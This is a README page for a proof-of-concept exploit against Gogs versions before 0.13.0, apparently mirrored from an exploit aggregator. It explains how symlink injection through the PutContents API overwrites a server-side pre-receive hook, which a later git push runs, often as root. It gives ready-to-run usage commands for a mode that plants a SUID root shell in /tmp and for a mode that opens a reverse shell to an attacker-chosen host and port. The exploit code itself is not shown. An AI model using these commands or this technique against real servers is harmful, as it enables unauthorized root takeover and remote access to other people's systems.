Share
## https://sploitus.com/exploit?id=E3BA60E1-B26F-5BC4-A9EB-8613E155A0E0
# CVE-2025-81110-PoC
Improper Symbolic link handling in the PutContents API in Gogs allows Local Execution of Code.

This repository contains a professional-grade exploit for a critical vulnerability in Gogs versions prior to 0.13.0. The exploit leverages a logical flaw where the Gogs API fails to validate file types when updating repository contents. By injecting a symbolic link that points to a server-side Git hook (pre-receive), an authenticated user can overwrite the hook's content with a malicious script. Subsequent Git push operations trigger the execution of this script under the context of the user running the Gogs service (typically root).

Symlink Injection: The attacker pushes a symbolic link pointing to internal repository hooks (e.g., /root/gogs-repositories//.git/hooks/pre-receive).

API Overwrite: The Gogs API allows updating the content of the symbolic link. Because the OS follows the link during the write operation, the internal Git hook is overwritten.

RCE / Privilege Escalation: A follow-up Git push triggers the pre-receive hook. If Gogs is configured with RUN_USER = root, the attacker gains full system control.

Requirements
- Python 3.x
- requests library
- git command-line tool installed on the attacker machine

# USAGE
## SUID Mode
```bash
python3 exploit.py --url http://target:3000 --user  --pass  --mode suid
```
After completion, gain root access on the target:
```bash
/tmp/rootbash -p
```
## REVSHELL
```bash
python3 exploit.py --url http://target:3000 --user  --pass  --mode rev --lhost  --lport 4444
```
# Argument Reference

| Argument | Required | Description |
| :--- | :--- | :--- |
| `--url` | Yes | The base URL of the Gogs instance (e.g., http://127.0.0.1:3001). |
| `--user` | Yes | Valid username for authentication. |
| `--pass` | Yes | Valid password for the specified user. |
| `--mode` | No | Exploit mode: suid (creates /tmp/rootbash) or rev (reverse shell). |
| `--lhost` | No | Local IP address for the reverse shell callback. |
| `--lport` | No | Local Port for the reverse shell listener. |

# Disclaimer
This tool is for educational purposes and authorized security auditing only. The author is not responsible for any misuse or damage caused by this tool on systems you own or have explicit permission to test.